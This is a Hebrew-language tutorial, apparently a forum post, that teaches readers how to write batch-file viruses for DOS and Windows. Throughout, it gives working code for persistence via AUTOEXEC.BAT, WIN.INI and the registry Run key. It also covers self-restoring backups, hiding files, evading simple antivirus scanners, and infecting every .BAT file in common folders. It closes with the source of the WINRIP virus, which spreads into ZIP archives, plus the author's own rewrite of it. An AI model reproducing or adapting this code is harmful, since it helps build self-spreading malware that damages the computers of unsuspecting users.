[Nדר*ך] לכתיבת וירוסים F2H הורדה ישירה מילים צלצול פלייבק רמיקס יוטיוב

רוצים ללמוד לכתוב וירוסים?

אז ככה תפתחו את הכתבן
אם אתם לא יודעים איך אז מקש ימני בשולחן העבודה---חדש---כתבן


מבנה התוכנית:

הוירוס עשוי להראות כך:

@ECHO OFF
CLS

(VARS SETTINGS)

--------------
VIRUS CODE
--------------

(MSG TO SCREEN)

EXIT / CLS / CRASH


השורות הראשונות נועדות בכדי להכין את קוד הוירוס עצמו. כמובן שכאן ה-CLS הראשון מיותר, זה רק
הרגל של הכתיבה האמת הוא נועד בכדי "לנקות" את המסך הקודם, גם במידה וקרא לתוכניות אחרות
שאמורות לחזור לאותה התוכנית לתווית מסוימת או בכלל.

לעיתים כותבים משתמשים במשתנים בתחילת התוכנית בכדי לארגן לעצמם את כל הבלאגן שנוצר. חוץ מזה,
במקרים שבהם רוצים להשתמש במשתנים שאמורים להתאפס בסיום התוכנית - כדאי לאפס אותם כבר מההתחלה
(וזאת משום שערך המשתנה אינו בהכרח מתאפס עם סיום התוכנית). בכל מקרה, האמת היא שרוב הכותבים
לא מתעסקים יותר מדי עם משתנים אישיים, לכן הצבתי את זה בסוגריים.

אחר כך, בא העיקר - קוד הוירוס. זה הגבול שמבדיל בין תוכניות רגילות לתוכניות וירוס. זה גם
המשמעות של כל העניין. בעיקרון, כל הטכניקות שאתה משתמש בהן נמצאות שם וזו ההשפעה האמיתית של
הוירוס. טכניקות אלו האמצעים (הכלים) שבהם אתה משתמש בכדי לכתוב וירוסים. לעיתים יש טכניקות
שמאפיינות וירוסים, אבל זה כבר משהו אחר.

לפעמים כותב מחליט להשאיר הודעה למשתמש, או יותר נכון לקרוא "חותמת". בדרך כלל להעביר
מסר מסוים, להפיץ את את שם הכותב או סתם ללעוג למשתמש; "Infected by the x virus" וכדומה.
גם את זה לא רואים בכל פעם (האמת זה נפוץ יותר בתחילת התוכנית), לכן גם את זה הצבתי בסוגריים.

והקטע האחרון - הסיום. את הסיום אתה יכול לבחור באיזו דרך שאתה רוצה. בין אם זה לצאת מהתוכנית
ולהחזיר את השליטה לתוכנית המארחת, או לנקות את המסך ולסיים את התוכנית, לבין לתקוע את המערכת.


טכניקות;

הרצה עצמית
------------

אני אסביר על מספר דרכים להרצה עצמית של התוכנית. הה"ע (מעכשיו כך נקרא לזה, בשביל לחסוך זמן
ואנרגיה) אחראית להשאיר את המערכת נגועה ותחת השפעת הוירוס. למעשה, ההשפעה של הוירוס תלויה
בהישרדות שלו ולכן ההישרדות תלויה בעוד טכניקות (גיבוי, הדבקה, הפצה).
דרך אחת זה להביא את הה"ע מוקדם כך שהתוכנית תעלה תחת קבצי אצווה שיש להם תפקיד כאשר הם רצים
כשמערכת Windows עולה. הדבר מאפשר להריץ פקודות תחת אפם של משתמשי Windows תמימים.
הקובץ ה"אידיאלי" הוא C:\autoexec.bat. לעיתים ניתן להריץ גם דרך Dosstart.bat אם אני לא טועה.
בכל מקרה, כותבים מעדיפים את הדרך הזו הכי מכל - כי סך הכל היא הכי יעילה.
יש שמעדיפים לכתוב על הקובץ עצמו בצורת Overwrite, כך שהמידע של הקובץ נאבד, ובמקומו מחדירים
קוד רצוי:

>C:\AUTOEXEC.BAT ECHO %WINDIR%\VIRUS.BAT


אבל זה די מעלה חשד כשתוכניות אחרות שסומכות על הקובץ לפתע אינן רצות... אז יש שפשוט עושים
דבר יעיל יותר וזה להחדיר את שורת הקוד בסוף התוכנית:

>>C:\AUTOEXEC.BAT ECHO %WINDIR%\VIRUS.BAT



יש כאלה שפשוט מחליטים להדביק את הקובץ עצמו ובכך להריץ את פקודות הקובץ בצורה ישירה מבלי
לקרוא לתוכנית:

COPY %0 C:\AUTOEXEC.BAT



דרך שנייה זה דרך קבצי מערכת של Windows, שהם למעשה Win.ini ו-System.ini שמצויים
בתיקיית ה-Windows. הנפוץ ביותר הוא השימוש ב-Win.ini.

>>%WINDIR%\WIN.INI ECHO [Windows]
>>%WINDIR%\WIN.INI ECHO run=%WINDIR%\VIRUS.BAT


זה לא משמיד נתונים ולא מזיק למערכת כלל, שכן גם אם תמחקו את הקובץ כליל המערכת תדאג לשחזר
חלק מן הערכים החשובים. הדרך הזו קצת יותר גלויה, משום שברגע שהמשתמש מעלה את Windows
תוכנית הוירוס נפתחת בתור חלון. לפיתרון מאולתר יש שמשתמשים ב-START /M.


דרך שלישית היא להשתמש ברישום (Registry). על ידי הוספת ערך מסוים ניתן להריץ את התוכנית
כמו בדרך השנייה:

>%TEMP%\VIRUS.REG ECHO REGEDIT4
>>%TEMP%\VIRUS.REG ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run]
>>%TEMP%\VIRUS.REG ECHO "VIRUS"="%windir%\\VIRUS.BAT"
REGEDIT /S %TEMP%\VIRUS.REG


גיבוי
-----

ובכן, גיבוי הוא חלק חשוב במלחמה נגד המשתמש. אם ההשפעה של הוירוס כל כך יקרה לכם, אתם חייבים
לפחות ליצור כזה. המילה "גיבוי" מכוונת למעשה לעותק/ים נוסף/ים של אותה תוכנית וירוס או אחרת.
במקרה ותוכנית ה"אם" נמחקה - יש לגבות אותה בעותק אחר בכדי שההשפעה לא תפסיק.
מכיוון שאותו גיבוי הוא למעשה עותקים של אותה תוכנית הנקראים Replications, גם ההדבקת קבצים
משתייכת לאותו חלק.

נניח למשל וה"ע מכוונת לקובץ C:\WINDOWS\VIRUS.BAT.
כעת נניח שלא נותר כעת קובץ כזה (נמחק, הועבר, השתנה שמו וכו'), התוצאה היא - הפסקת ההשפעה.
בכדי למנוע זאת, יש לבצע בדיקה אם קובץ כזה קיים, במידה ולא - יש לגבות אותו:

IF NOT EXIST %WINDIR%\VIRUS.BAT COPY %0 %WINDIR%\VIRUS.BAT


לה"ע יש חלק חשוב בכל הנוגע לגיבוי הוירוס. נניח ואנו משתמשים ב-AUTOEXEC.BAT כההרצה העצמית
של הוירוס שלנו.
נוכל להחדיר בו קוד שידאג לגבות את אותו קובץ עם כל הפעלה של המחשב:

IF NOT EXIST %WINDIR%\VIRUS.BAT COPY %TEMP%\VIRUS_BACKUP %WINDIR%\VIRUS.BAT


ההבדל בין קוד זה לקוד הקודם הוא שבראשון אנו מכוונים את הגיבוי להעתק עצמו של הוירוס.
בשני אנו למעשה מעתיקים העתק אחר (משום שאנו משתמשים בתוכנית AUTOEXEC.BAT, ולא הדבקנו אותה).

דרך זו עוזרת גם להתחמק ממספר תוכנות אנטי-וירוס לא מתוחכמות.
זאת משום שחלק מהן לא סורקות פורמטים של קבצים מסוימים שנחשבים "לא מסוכנים" (TXT למשל) ולכן
גם לא עוברות על הקוד שלהם.
לכן נוכל להעתיק את קוד הוירוס כגיבוי בתור קובץ טקסט, ולהורות לה"ע להעתיק את אותו קובץ
טקסט חזרה בצורת גיבוי במקרה והקובץ חסר.
כלומר:

נעתיק את קוד הוירוס ונשמור אותו בקובץ טקסט:

COPY %0 %TEMP%\VIRUSCODE.TXT


כעת, להורות לה"ע לשחזר את קובץ הוירוס - במידה והוא חסר:

IF NOT EXIST %WINDIR%\VIRUS.BAT COPY %TEMP%\VIRUSCODE.TXT %WINDIR%\VIRUS.BAT


כמובן שניתן גם לשחק עם סגולות הקובץ עצמו ובכך לנסות ולשמור על הקוד שלו, או להחביא אותו:

ATTRIB +H +R %WINDIR%\VIRUS.BAT


זה מקנה הגנת "קריאה בלבד" ולכן לא ניתן לכתוב על הקובץ בצורה חוקית.
זה גם מקנה לקובץ מאפיין של קובץ מוסתר, ויש להסיר זאת במקרה ורוצים לפנות לקובץ.

הדבקת קבצים
--------------

אוקיי, הגענו לחלק מעניין יותר.
עקרונית, "הדבקת קבצים" היא למעשה העתקת קוד של וירוס לקוד של תוכנית אחרת.
לכן ניתן לכתוב:

COPY %0 PROGRAM.BAT


ולהגיד שהדבקנו את הקובץ.

כן, זה מאוד פשוט. אבל האם זה יעיל?
המטרה שלנו היא להדביק כמה שיותר קבצי אצווה נוספים.
לכן ננסה ולהדביק את כל הקבצים באזור (כלומר, בתיקייה הנוכחית) או באזורים המוכרים לנו (Windows, Temp).

לכן נכתוב שורת-קוד פשוטה למדי:

FOR %%C IN (*.BAT, %WINDIR%\*.BAT, %TEMP%\*.BAT) DO COPY %0 %%C


הדבר יוצר לולאת FOR שגורמת להעתיק את קובץ הוירוס לכל קובץ אצווה שנמצא שם (כולל קובץ הוירוס עצמו).
ליתר תחכום ניתן להוריד את כל תכונות הקובץ (קריאה בלבד, מוסתר) במידה ויש להם:

ATTRIB -H -R -S *.BAT
ATTRIB -H -R -S %WINDIR%\*.BAT
ATTRIB -H -R -S %TEMP%\*.BAT


במקרים מיוחדים שבהם אתם לא רוצים שההשפעה של ההדבקה תגיע לקובץ הוירוס עצמו (נניח ולמשל אתם כותבים
וירוס פולי - (פולימורף) וירוס שהמקור שלו נוהג להשתנות, בדרך כלל להתחמק משיטתיות של תוכנות אנטי-וירוס),
אתם לא רוצים שההשפעה תגיע לקובץ הוירוס, נכון? אחרת קוד המקור יישאר זהה לכולם.
לכן נבצע בדיקה מוקדמת לפני ההעתקה:

FOR %%C IN (*.BAT, %WINDIR%\*.BAT, %TEMP%\*.BAT) DO IF NOT %0==%%C COPY %0 %%C


שיטת הדבקה זו יוצרת חשד משום שהוירוס מעתיק את הקוד שלו על קבצים אחרים, ולכן כל קוד קודם שהיה
בקובץ - נמחק.
הדבר יוצר בעיה מסוימת של חשד, משום שתוכניות אצווה שהיו אמורות לעבוד - אינן עובדות כבר כמו שצריך.
לדוגמא במשחקים, תוכניות התקנה/הסרה וכו'.

לכן, במקום למחוק את כל הקוד הקודם ולהחליף בקוד חדש, ניתן להחדיר את קוד הוירוס בסוף קוד התוכנית
ובכך לגרום לתוכנית הרגילה לרוץ וגם לתוכנית הוירוס שבתוכה.

התהליך דומה לשיטת ההדבקה של וירוס ה-OVERWRITING (חוץ מזה ש-2 חלקי התוכנית -פועלים- ושלא כותבים
על קוד המקור עצמו של התוכנית, אלא רק בסופה).

הקוד:

SET INF=X
FOR %%C IN (*.BAT, %WINDIR%\*.BAT, %TEMP%\*.BAT) DO SET INF=%%C
IF %INF%==X GOTO NO_BATCH_FILES
ATTRIB -H -R -S %INF%
>>%INF% TYPE %0


הקוד מורה לבחור רק קובץ אחד ולהדביק אותו.
בכדי להדביק את כולם, יש לבחור אחד-אחד ולהדביק כל אחד בנפרד:


:INFECTION

SET INF=X
FOR %%C IN (*.BAT, %WINDIR%\*.BAT, %TEMP%\*.BAT) DO SET INF=%%C
IF %INF%==X GOTO RESTORE_BATCH
ATTRIB -H -R -S %INF%
>>%INF% TYPE %0
REN %INF% *.SCN

GOTO INFECTION

:RESTORE_BATCH

REN *.SCN *.BAT
REN %WINDIR%\*.SCN *.BAT
REN %TEMP%\*.SCN *.BAT


עכשיו, על ידי ביצוע הפקודות אנחנו פשוט בוחרים קובץ-קובץ ע"י סריקה של לולאת ה-FOR וננעלים עליו.
מורידים ממנו את כל התכונות ומחדירים בתוכו את קוד התוכנית של הוירוס.
אחר כך משנים את הסיומת שלו לאלתר, בכדי להרחיק אותו מהסריקה (שלא יידבק שוב ושוב).
עוברים לקובץ הבא, וברגע שאין יותר קבצים (כש-INF=X למעשה) בסיומת .BAT אז עוברים לתווית שבא
משחזרים את הסיומות לכל הקבצים שנסרקו (אלו שבעלי .SCN).

זו למשל דרך שאני כתבתי להדבקת קבצים - כל אחד יכול לעשות זאת בדרך שלו.
רק בשביל ידע נוסף אני אסביר על וירוס באצווה עם טכניקה די מקורית, ואחר כך נעבור לחלק של ההפצה.

הוירוס W32/BAT/WINRIP (או סתם BAT.WINRIP) הוא וירוס באצווה, נכתב על ידי אחד מקבוצת SKAMWERKS.
התוכנית בעלת קוד מועט יחסית, המפיצה את עצמה במערכת על ידי הוספתה לכל קובץ זיפ שהיא מוצאת.
הקוד:


@echo off
@echo REM WINRIP by SkamWerks Labs > winripem.bat
@copy winrip.bat "c:\..\..\..\..\..\..\..\winnt\profiles\default user\start menu\programs\startup\winrip.bat"
@dir /s /b /l c:\winzip32.exe | set wz=
@FOR /F "delims==" %%y IN ('dir /s /b /l c:\*.zip') DO @echo "%wz%" -min -a -r -p "%%y" "c:\..\..\..\..\..\..\..\winnt\profiles\default user\start menu\programs\startup\winrip.bat" >> winripem.bat
@call winripem.bat
@del winripem.bat


הוירוס מעתיק את עצמו לתיקיית ה-STARTUP של Windows (הרצה עצמית).
אחר כך הוא מחפש את קובץ ה-winzip32.exe וננעל עליו.
הוא מריץ את אותו קובץ ומורה לו להעלות את קובץ הוירוס לכל קבצי ה-zip שנמצאים.
זה בעצם העיקרון.

אפשר לראות שהגירסא של DOS המכוונת לוירוס היא די מיושנת.
ניסיתי לתרגם את הקוד לגירסאת ה-DOS שלי וזה מה שקיבלתי:

@ECHO OFF
CLS

REM WINRIP - INFECTING WINZIP FILES
REM A NEW VERSION BY BLACKSNAKE

COPY %0 %WINDIR%\WINRIP.BAT
ATTRIB +R %WINDIR%\WINRIP.BAT

>>%WINDIR%\WIN.INI ECHO [WINDOWS]
>>%WINDIR%\WIN.INI ECHO RUN=%WINDIR%\WINRIP.BAT

:OPERATION

IF NOT EXIST C:\PROGRA~1\WINZIP\WINZIP32.EXE GOTO CANCEL_OPERATION

:OPERATION_GO

SET WINZIP=C:\PROGRA~1\WINZIP\WINZIP32.EXE
FOR %%C IN (*.ZIP, %WINDIR%\.ZIP, %TEMP%\.ZIP) DO %WINZIP% -MIN -A -R -P "%%C" %0

:CANCEL_OPERATION

REM DONE